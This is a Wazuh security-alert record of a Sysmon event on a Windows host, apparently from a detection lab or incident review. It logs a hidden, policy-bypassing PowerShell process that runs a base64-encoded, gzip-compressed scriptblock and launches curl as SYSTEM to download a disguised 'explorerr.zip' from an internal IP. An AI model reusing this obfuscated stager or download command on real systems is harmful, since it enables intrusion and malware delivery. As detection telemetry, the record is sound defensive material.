Wazuh home
Modules
EC2AMAZ-8RL9EPE
Security events
→
Selected fields

Available fields

2 hits
Mar 29, 2024 @ 00:00:00.000 - Mar 29, 2024 @ 12:00:00.000
Documents
	Time
rule.descriptionrule.levelrule.id
Mar 29, 2024 @ 11:01:13.786C:\\Windows\\SysWOW64\\curl.exe launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe executed a compressed file creation command
6
92067
Expanded document
View surrounding documents
View single document
_index
	wazuh-alerts-4.x-2024.03.29
agent.id
	002
agent.ip
	10.0.1.20
agent.name
	EC2AMAZ-8RL9EPE
data.win.eventdata.commandLine
	\"C:\\Windows\\system32\\curl.exe\" -o C:\\Users\\Grace\\Desktop\\explorerr.zip http://10.0.2.23:10952/explorerr.zip
data.win.eventdata.company
	curl, https://curl.se/
data.win.eventdata.currentDirectory
	C:\\Users\\Grace\\
data.win.eventdata.description
	The curl executable
data.win.eventdata.fileVersion
	7.83.1
data.win.eventdata.hashes
	SHA1=6EDAE73E36B61B261369717EA3657A6783EBA872,MD5=44E5BAEEE864F1E9EDBE3986246AB37A,SHA256=4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB,IMPHASH=FC799C0F8A0C16C28C597E4FC70B806C
data.win.eventdata.image
	C:\\Windows\\SysWOW64\\curl.exe
data.win.eventdata.integrityLevel
	System
data.win.eventdata.logonGuid
	{ab1eae9a-9eb8-6606-e703-000000000000}
data.win.eventdata.logonId
	0x3e7
data.win.eventdata.originalFileName
	curl.exe
data.win.eventdata.parentCommandLine
	
powershell.exe -nop -w hidden -noni -ep bypass \"&amp;([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAK+'+'XBmYCA5VVXW/{1}NhR996+'+'4MNRFQmTC8{1}BhDZBinpoOA{1}LWqLLlwTAQmrqOtdCkR1KxjcT/faREfThO0FYPtsR7eXh47rnkoh'+'DM5FLAn{0}gGtzhnPEdhoPfUA/sEGwYX8Bk3gy/zf5EZGNzs1viZrtAOGmLzkzK/TiZ/a/yIC1pwkyjM{1}CSnXFuIwKgCm6yJktsdeZFhxzsjdW5v31vUFNdyg8p+WXZQxidU0VVYvU9To3JxPwsS'+'uVpRkcWHo6nmTIoXgx/lRnBJs3I08phKMtQavAArmRUcHcHfwwiqlHwBY{1}0MDPA/6M9zkfWjMljNK+fyXBsUqOzka{1}qz7yviVEsle0CjyQ1{'+'1}X/uM{0}ftff/nteCLRhirj1vUrl1FfootO3pgxXBsLWJUjrKjs36Kr8BGVxmPGDXSn5K8xTyZ+of7ZkAzJiIx+7sduD37hXiWeNgrpyjGtgIk1WVqOWYYtt'+'6o{0}FTXnk74vRYeY1jytwd7ghqxQud'+'m'+'RtE4N/fpxsLCGwjh8Cm4s+'+'h4GVMP0YM5XXEmDCSqTL3JGDf5DeZ5R57qEcj6n7GEWRa/QIePCLJ1l3aSxfkWVQBScx33D9dmo76l0kRqJ{0}i1{0}NZzOdwans1ng/p0Nh4SMhvZ5fvc03HuZUWR1OJwa3BqCgsnMefz8fJwmV1eRk/4PlxP{0}{1}61Z5U{1}DxLVTukTOQRVC{0}GywwhTaGrYPpxCgeDx3X8K1+6kdszVqAkyu1oVpg'+'3cikeudyu+XBsIkgr9ypqSWCwOJVGupSi0JjN1iLkmDQov9iBm5E3fCW9HLQW5tVTBsNxYP4/aDXKO4N8uug+pG7nroyEI/ptL0dA{1}XFtLJ4g8B0vD8ca71rE9SXVK{0}tJwrUMhFc8i0WS1t94QHZ3NE6t1Wx1iNFD1fiUf5gIPL7dpqq63eDcq+a6nNMucYhkFeuq7axF'+'ekWVh5LIZhDMEB+wgGAmF4JOml0w+zG6vlW9'+'eE71CXQkqNL73mLYrtM+qodND8QVHurhYVgjx6UU3{1}lq6YR/uGQX3cVeCjDz+dwTN8KcygQgVvngOoEZSC1MCncDJJ4cT+l/pfS1Z6OCITapYu+gFOWpCtIxKgUlJNh7ODxTqsyzhhHKkKo9cYXHQ/{1}Ktte8cG/i7/tjDfdGzXsEd+red84oVeNjegP3j8qZ5wqdHvp{0}zH+l7qGqa9rFIj1/UN5X+tM5vLvamdv6X+B5mITW+iCA'+'AA')-f'2','b')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\"
data.win.eventdata.parentImage
	C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
data.win.eventdata.parentProcessGuid
	{ab1eae9a-9f33-6606-8a00-000000007801}
data.win.eventdata.parentProcessId
	2016
data.win.eventdata.parentUser
	NT AUTHORITY\\SYSTEM
data.win.eventdata.processGuid
	{ab1eae9a-9f78-6606-9900-000000007801}
data.win.eventdata.processId
	460
data.win.eventdata.product
	The curl executable
data.win.eventdata.ruleName
	CURL Execution
data.win.eventdata.terminalSessionId
	0
data.win.eventdata.user
	NT AUTHORITY\\SYSTEM
data.win.eventdata.utcTime
	2024-03-29 11:01:12.253
data.win.system.channel
	Microsoft-Windows-Sysmon/Operational
data.win.system.computer
	EC2AMAZ-8RL9EPE
data.win.system.eventID
	1
data.win.system.eventRecordID
	480
data.win.system.keywords
	0x8000000000000000
data.win.system.level
	4
data.win.system.message
	
"Process Create:
RuleName: CURL Execution
UtcTime: 2024-03-29 11:01:12.253
ProcessGuid: {ab1eae9a-9f78-6606-9900-000000007801}
ProcessId: 460
Image: C:\Windows\SysWOW64\curl.exe
FileVersion: 7.83.1
Description: The curl executable
Product: The curl executable
Company: curl, https://curl.se/
OriginalFileName: curl.exe
CommandLine: "C:\Windows\system32\curl.exe" -o C:\Users\Grace\Desktop\explorerr.zip http://10.0.2.23:10952/explorerr.zip
CurrentDirectory: C:\Users\Grace\
User: NT AUTHORITY\SYSTEM
LogonGuid: {ab1eae9a-9eb8-6606-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA1=6EDAE73E36B61B261369717EA3657A6783EBA872,MD5=44E5BAEEE864F1E9EDBE3986246AB37A,SHA256=4BCA545DD0DEAC696838C6338BA66A934426A34CE43D136D2750436F31E6BAFB,IMPHASH=FC799C0F8A0C16C28C597E4FC70B806C
ParentProcessGuid: {ab1eae9a-9f33-6606-8a00-000000007801}
ParentProcessId: 2016
ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAK+'+'XBmYCA5VVXW/{1}NhR996+'+'4MNRFQmTC8{1}BhDZBinpoOA{1}LWqLLlwTAQmrqOtdCkR1KxjcT/faREfThO0FYPtsR7eXh47rnkoh'+'DM5FLAn{0}gGtzhnPEdhoPfUA/sEGwYX8Bk3gy/zf5EZGNzs1viZrtAOGmLzkzK/TiZ/a/yIC1pwkyjM{1}CSnXFuIwKgCm6yJktsdeZFhxzsjdW5v31vUFNdyg8p+WXZQxidU0VVYvU9To3JxPwsS'+'uVpRkcWHo6nmTIoXgx/lRnBJs3I08phKMtQavAArmRUcHcHfwwiqlHwBY{1}0MDPA/6M9zkfWjMljNK+fyXBsUqOzka{1}qz7yviVEsle0CjyQ1{'+'1}X/uM{0}ftff/nteCLRhirj1vUrl1FfootO3pgxXBsLWJUjrKjs36Kr8BGVxmPGDXSn5K8xTyZ+of7ZkAzJiIx+7sduD37hXiWeNgrpyjGtgIk1WVqOWYYtt'+'6o{0}FTXnk74vRYeY1jytwd7ghqxQud'+'m'+'RtE4N/fpxsLCGwjh8Cm4s+'+'h4GVMP0YM5XXEmDCSqTL3JGDf5DeZ5R57qEcj6n7GEWRa/QIePCLJ1l3aSxfkWVQBScx33D9dmo76l0kRqJ{0}i1{0}NZzOdwans1ng/p0Nh4SMhvZ5fvc03HuZUWR1OJwa3BqCgsnMefz8fJwmV1eRk/4PlxP{0}{1}61Z5U{1}DxLVTukTOQRVC{0}GywwhTaGrYPpxCgeDx3X8K1+6kdszVqAkyu1oVpg'+'3cikeudyu+XBsIkgr9ypqSWCwOJVGupSi0JjN1iLkmDQov9iBm5E3fCW9HLQW5tVTBsNxYP4/aDXKO4N8uug+pG7nroyEI/ptL0dA{1}XFtLJ4g8B0vD8ca71rE9SXVK{0}tJwrUMhFc8i0WS1t94QHZ3NE6t1Wx1iNFD1fiUf5gIPL7dpqq63eDcq+a6nNMucYhkFeuq7axF'+'ekWVh5LIZhDMEB+wgGAmF4JOml0w+zG6vlW9'+'eE71CXQkqNL73mLYrtM+qodND8QVHurhYVgjx6UU3{1}lq6YR/uGQX3cVeCjDz+dwTN8KcygQgVvngOoEZSC1MCncDJJ4cT+l/pfS1Z6OCITapYu+gFOWpCtIxKgUlJNh7ODxTqsyzhhHKkKo9cYXHQ/{1}Ktte8cG/i7/tjDfdGzXsEd+red84oVeNjegP3j8qZ5wqdHvp{0}zH+l7qGqa9rFIj1/UN5X+tM5vLvamdv6X+B5mITW+iCA'+'AA')-f'2','b')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
ParentUser: NT AUTHORITY\SYSTEM"
data.win.system.opcode
	0
data.win.system.processID
	2828
data.win.system.providerGuid
	{5770385f-c22a-43e0-bf4c-06f5698ffbd9}
data.win.system.providerName
	Microsoft-Windows-Sysmon
data.win.system.severityValue
	INFORMATION
data.win.system.systemTime
	2024-03-29T11:01:12.263261400Z
data.win.system.task
	1
data.win.system.threadID
	3616
data.win.system.version
	5
decoder.name
	windows_eventchannel
id
	1711710073.36762554
input.type
	log
location
	EventChannel
manager.name
	ip-10-0-0-10
rule.description
	C:\\Windows\\SysWOW64\\curl.exe launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe executed a compressed file creation command
rule.firedtimes
	1
rule.groups
	sysmon, sysmon_eid1_detections, windows
rule.id
	92067
rule.level
	6
rule.mail
	false
rule.mitre.id
	T1560.001
rule.mitre.tactic
	Collection
rule.mitre.technique
	Archive via Utility
timestamp
	Mar 29, 2024 @ 11:01:13.786
Mar 29, 2024 @ 11:01:13.786C:\\Windows\\SysWOW64\\curl.exe launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe executed a compressed file creation command
6
92067
​
